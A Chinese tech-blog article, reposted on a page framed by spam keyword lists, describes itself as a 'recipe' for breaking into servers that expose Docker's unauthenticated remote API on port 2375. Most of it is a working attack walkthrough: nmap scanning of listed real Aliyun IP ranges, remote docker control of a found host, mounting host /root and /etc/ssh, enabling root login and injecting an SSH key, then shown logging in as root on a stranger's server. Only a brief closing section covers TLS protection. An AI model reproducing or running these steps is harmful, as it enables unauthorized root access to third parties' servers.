婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Docker暴露2375端口導致服務器被攻擊問題及解決方法

Docker暴露2375端口導致服務器被攻擊問題及解決方法

熱門標簽:地圖標注能更改嗎 廈門防封電銷電話卡 高德地圖標注公司需要錢 外呼系統(tǒng)全國 云南電商智能外呼系統(tǒng)哪家好 宜賓銷售外呼系統(tǒng)軟件 地圖標注員有發(fā)展前景嗎 濰坊寒亭400電話辦理多少錢 四川保險智能外呼系統(tǒng)

相信了解過docker remote API的同學對2375端口都不陌生了,2375是docker遠程操控的默認端口,通過這個端口可以直接對遠程的docker daemon進行操作。

當$HOST主機以docker daemon -H=0.0.0.0:2375方式啟動daemon時,可以在外部機器對$HOST的docker daemon進行直接操作:

docker -H tcp://$HOST:2375 ps

好,說說如何“入侵”,怎么通過這個端口入侵宿主機呢?

這個應該要從幾個點說起吧:
1. docker對user namespace沒有做隔離,也就是說,容器內(nèi)部的root用戶就是宿主機的root用戶,一旦掛載目錄,就可以在容器內(nèi)部以宿主機的root用戶身份對掛載的文件系統(tǒng)隨意修改了。

  • docker服務擁有很高的執(zhí)行權利(相當于root),并且在docker用戶組下的普通用戶不需要任何其他驗證就可以執(zhí)行docker run等命令。
  • 暴露的docker remote API端口如果沒有啟動ssl驗證的話,任何能連通到這臺docker宿主機的的機器都可以隨意操作這臺docker宿主機的docker daemon(docker run、docker ps、docker rm等等這些命令都不在話下)。

結合以上3點,就基本具備入侵docker宿主機的條件了

講得似乎有點懸,不多說,直接拿一個活鮮鮮的例子來講吧:

(請允許我用最近新學的一道菜將流程帶過 ╮( ̄▽ ̄)╭ )

秘制紅燒肉(docker版)

材料:一整塊一整塊的“5花”IP段,越肥越好(小白用戶越多越好)

配料:nmap,docker

step 1: 掃描2375端口

怎么掃?我選用的是簡單易用的黑客必備神器nmap了。

掃哪里呢?我選的目標是aliyun的IP段,百度得知:

42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China 
42.120.0.0/16 Aliyun Computing Co., LTD China 
42.121.0.0/16 Aliyun Computing Co., LTD China 
42.156.128.0/17 Aliyun Computing Co., LTD China 
110.75.0.0/16 Asia Pacific Network Information Centre China 
110.76.0.0/19 Ali Technology Co., Ltd China 
110.76.32.0/20 Aliyun Computing Co., LTD China 
110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China 
110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China 
112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China 
119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
140.205.0.0/16 Aliyun Computing Co., LTD China 
203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 
218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.

我不生產(chǎn)IP,我只是百度的搬運工,別問我這些IP從那來,我也想知道~ >.<

將上面IP內(nèi)容保存在一個文件中,如 aliyun.list

開始掃描:

cat aliyun.list| awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open 
# 簡單解釋一下命令:
# awk 將第一列IP網(wǎng)段過濾出來
# xargs 將過濾出來的IP一個一個的分次送給nmap,-I {} 是指使用{}來代替?zhèn)魉偷膮?shù)
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT STATE SERVICE
# 2375/tcp open docker
# ...

不到兩分鐘,第一塊42.96.MOSAIC.MOSAIC(五花肉已打碼) “五花肉”選好了,來吧~

step 2: 測試2375的直接控制權

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps
 
# CONTAINER ID IMAGE    COMMAND   CREATED  STATUS  PORTS  
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh"  9 days ago  Up 3 days  0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2   "rethinkdb --bind all" 9 days ago  Up 3 days  8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago  Up 3 days  0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine   "nginx -g 'daemon off" 3 weeks ago  Up 3 days  443/tcp, 0.0.0.0
# ...

這個服務器的owner也太配合了(⊙ο⊙),ps直接看到內(nèi)容,說明這個主機的2375是沒有ssl驗證的,基本滿足入侵要求。

“五花”洗好,切好,準備下鍋~

step 3: 遠程啟動自己的容器

拿到了docker的控制權能做什么呢?拿到了就呵呵了~

# images 看看本地已有的鏡像
# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images
# ...
# swarm    latest  47dc182ea74b 4 weeks ago  19.32 MB
# jwilder/nginx-proxy  latest  203b20631e41 4 weeks ago  255.6 MB
# ubuntu    latest  c5f1cf30c96b 4 weeks ago  120.8 MB
# shipyard/shipyard   latest  ba426f0944bc 5 weeks ago  58.92 MB
# ...

省略了一部分輸出,鏡像還蠻多的,就選個ubuntu吧

# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

看到這步,相信對ssh有一些了解的同學應該就明白了

step 4: ssh pub key 注入

在剛剛啟動的容器中先看看 /tmp/ssh_etc/sshd_config (就是宿主機的/etc/ssh/sshd_config) 的PermitRootLogin字段。如果是no就改成yes,允許root通過ssh登錄

然后在你的機器上生成一對新的pub key(已經(jīng)有ssh key的也建議生成一個新的,不要使用自己日常使用的ssh pub key)

# 使用 ssh-keygen生成
ssh-keygen -t rsa -C "hello@world.com"
# 執(zhí)行命令后的提示Enter file in which to save the key要看好,不要把自己的ssh key覆蓋了,可以選著/tmp/id_rsa
# 其他提示enter到底即可

繼續(xù),注入ssh pub key,回到剛剛啟動的容器執(zhí)行

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # 這里粘貼你剛剛在自己機器生成的/tmp/id_rsa.pub
>EOF
 
# 如果/tmp/root/.ssh目錄不存在,就直接創(chuàng)建

八角香葉生抽老抽醋都加上,中火烹飪,準備出鍋~

step 5: 登入服務器

# ssh -i 指定秘鑰登錄
ssh -i /tmp/id_rsa root@42.96.MOSAIC.MOSAIC
 
# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...

大火收汁,起鍋!

鄭重聲明

以上教程僅為交流學習之用,42.96.MOSAIC.MOSAIC 服務器上的id_rsa.pub在制作完本教程后已主動清除,并在服務上留言告知。

如果你一不小心也發(fā)現(xiàn)了可用的2375端口,希望也能點到即止,誤做他用,或者發(fā)現(xiàn)其他入侵漏洞,可以和大家交流學習。

2375是docker漏洞嗎?

非也!2375直接裸露地暴露在公網(wǎng)上純屬是用戶習慣或者偷懶的問題2375可以在相對安全的內(nèi)部網(wǎng)絡中方便測試使用,并不適合使用在投入到生產(chǎn)環(huán)境中。

docker官網(wǎng)第一篇文檔quick start上有句話是這樣子的:

Warning: Changing the default docker daemon binding to a TCP port or
Unix docker user group will increase your security risks by allowing
non-root users to gain root access on the host. Make sure you control
access to docker. If you are binding to a TCP port, anyone with
access to that port has full Docker access; so it is not advisable
 on an open network.

已經(jīng)Warning告知:如果將daemon直接暴露在一個TCP端口,將可能會被以非root用戶去獲取宿主機的root權限。其實上面的說提到的服務器之所以這么容器被入侵,也正是這個原因。

何以防之

那么,問題來了,如果想用Remote API,又不想有被入侵的風險,怎么辦呢?

docker官方文檔上介紹了一種通過CA認證方式使用Remote API

具體可以參考:Protect the Docker daemon socket

(等理解了再補一篇博客吧,就姑且讓我以一個鏈接的形式帶過吧O.O)

配置過程還算是比較簡單的,下面放一張圖,展示配置SSL后的效果:

到此這篇關于Docker暴露2375端口導致服務器被攻擊問題及解決方法的文章就介紹到這了,更多相關docker 暴露2375 端口內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

標簽:巴彥淖爾 紅河 廣安 廊坊 湛江 回訪 德州 滁州

巨人網(wǎng)絡通訊聲明:本文標題《Docker暴露2375端口導致服務器被攻擊問題及解決方法》,本文關鍵詞  Docker,暴露,2375,端口,導致,;如發(fā)現(xiàn)本文內(nèi)容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Docker暴露2375端口導致服務器被攻擊問題及解決方法》相關的同類信息!
  • 本頁收集關于Docker暴露2375端口導致服務器被攻擊問題及解決方法的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    天堂av在线一区| 欧美天堂一区二区三区| 日韩欧美一区二区久久婷婷| 懂色av噜噜一区二区三区av| 亚洲图片欧美视频| 中文字幕一区不卡| 久久精品水蜜桃av综合天堂| 欧美一卡二卡三卡| 欧美日韩中字一区| 不卡一卡二卡三乱码免费网站 | 678五月天丁香亚洲综合网| 天天色 色综合| 中文字幕日韩一区| 精品国产免费人成电影在线观看四季| 在线观看视频欧美| 91美女在线看| 欧美最猛性xxxxx直播| av不卡一区二区三区| 成人av在线观| 不卡区在线中文字幕| 波多野结衣中文字幕一区二区三区 | 午夜精品成人在线视频| 成人黄色软件下载| 粉嫩一区二区三区在线看| 国产成人丝袜美腿| 国产一区二区福利视频| 国产一二三精品| 高清免费成人av| 97se亚洲国产综合在线| 99re热这里只有精品视频| 91小视频在线| 色综合久久66| 欧美日韩日本视频| 日韩视频一区二区在线观看| 日韩欧美三级在线| 欧美国产成人在线| 一区二区三区**美女毛片| 樱桃视频在线观看一区| 亚洲图片有声小说| 国内欧美视频一区二区| 波多野结衣精品在线| 欧美亚洲综合久久| 欧美一区二区三区四区五区 | 一区二区三区.www| 日韩精品成人一区二区三区| 琪琪一区二区三区| 国产高清一区日本| 在线日韩国产精品| 精品免费一区二区三区| 综合激情成人伊人| 日韩精品乱码免费| 岛国精品在线观看| 在线播放91灌醉迷j高跟美女| 久久精品免费在线观看| 亚洲午夜视频在线| 成人自拍视频在线观看| 51久久夜色精品国产麻豆| 国产欧美一区二区三区网站| 午夜精品视频一区| 成人免费看黄yyy456| 欧美日韩精品高清| 国产精品丝袜在线| 久久国产精品色| 欧美性猛交一区二区三区精品| 精品日韩99亚洲| 亚洲成人av电影在线| 成人h版在线观看| 26uuu国产日韩综合| 久久av中文字幕片| 日本一区二区三区国色天香 | 午夜视频久久久久久| 91精品国产综合久久婷婷香蕉| 日韩电影在线一区二区| 中文字幕五月欧美| 亚洲欧洲中文日韩久久av乱码| 日本网站在线观看一区二区三区 | 五月婷婷激情综合| 波多野结衣在线aⅴ中文字幕不卡| 91精品国产乱| 午夜精品久久久久久久久久| av电影在线观看一区| 精品国产不卡一区二区三区| 日韩二区三区四区| 欧美三级视频在线播放| 亚洲视频电影在线| av毛片久久久久**hd| 国产精品丝袜黑色高跟| 久久精品国产一区二区三| 7777女厕盗摄久久久| 天天综合色天天综合| 欧美四级电影在线观看| 亚洲一区二区成人在线观看| 欧美在线视频你懂得| 亚洲小说欧美激情另类| 欧美三区在线视频| 视频一区在线播放| 欧美一级日韩不卡播放免费| 奇米影视7777精品一区二区| 欧美一区二区三区在线视频| 午夜精品免费在线| 欧美一区二区三区日韩视频| 91丨porny丨首页| 欧美一区二区精美| 色狠狠综合天天综合综合| 亚洲精品一区二区三区在线观看| 亚洲成a人片综合在线| 欧美图区在线视频| 日韩1区2区日韩1区2区| 欧美变态凌虐bdsm| 国产在线视频不卡二| 国产欧美日韩视频在线观看| 成人午夜精品在线| 亚洲免费看黄网站| 欧美色老头old∨ideo| 视频在线在亚洲| 精品乱人伦小说| 国产ts人妖一区二区| 亚洲色图一区二区| 国产在线播放一区二区三区| 九九热在线视频观看这里只有精品| 一本大道久久精品懂色aⅴ| 精品福利av导航| 欧美国产亚洲另类动漫| 日本一区二区三区久久久久久久久不| 国产精品99久久久久久宅男| 亚洲欧洲国产专区| 欧洲精品视频在线观看| 午夜一区二区三区视频| 日韩欧美中文字幕制服| 99在线热播精品免费| 亚洲第一在线综合网站| 欧美成人一区二区三区片免费 | 亚洲日韩欧美一区二区在线| 欧美肥妇毛茸茸| 福利电影一区二区三区| 在线观看91视频| 91精品国产福利| 美女高潮久久久| 欧美激情一二三区| 日本韩国欧美三级| 精品一区二区影视| 亚洲日本丝袜连裤袜办公室| 制服丝袜av成人在线看| 成人一区在线看| 日本大胆欧美人术艺术动态| 最新热久久免费视频| 精品国产一区a| 欧美亚一区二区| 成人国产精品免费网站| 日韩高清在线不卡| 亚洲综合视频网| 中文字幕高清不卡| 欧美不卡一区二区| 欧美日韩精品三区| 色偷偷成人一区二区三区91| 国产盗摄一区二区三区| 久久机这里只有精品| 偷偷要91色婷婷| 亚洲一区免费在线观看| 国产精品久久久久久久浪潮网站| 欧美一级国产精品| 欧美亚洲一区三区| 91看片淫黄大片一级在线观看| 国产剧情在线观看一区二区| 日本怡春院一区二区| 午夜精品福利一区二区三区av| 亚洲欧美偷拍另类a∨色屁股| 国产日韩欧美精品电影三级在线| 日韩欧美成人午夜| 日韩欧美在线观看一区二区三区| 在线亚洲一区二区| 91最新地址在线播放| 粉嫩aⅴ一区二区三区四区五区| 精品一区二区免费在线观看| 亚洲成人av电影在线| 亚洲国产精品影院| 午夜精品福利久久久| 亚洲最新视频在线观看| 成人精品免费看| 午夜亚洲福利老司机| 欧美日韩电影在线| 欧美视频你懂的| 欧美日韩小视频| 91麻豆精品国产无毒不卡在线观看| 欧洲精品中文字幕| 欧美日韩精品一区二区三区 | 欧美高清在线精品一区| 2021国产精品久久精品| 337p粉嫩大胆色噜噜噜噜亚洲| 精品欧美一区二区久久| 亚洲精品在线三区| 欧美激情一区二区三区蜜桃视频| 日本一区二区三区高清不卡| 国产精品久久久久aaaa| 亚洲免费高清视频在线| 亚洲国产aⅴ天堂久久| 免费观看一级欧美片| 国产伦理精品不卡| 91丨porny丨国产| 91麻豆精品国产自产在线观看一区 |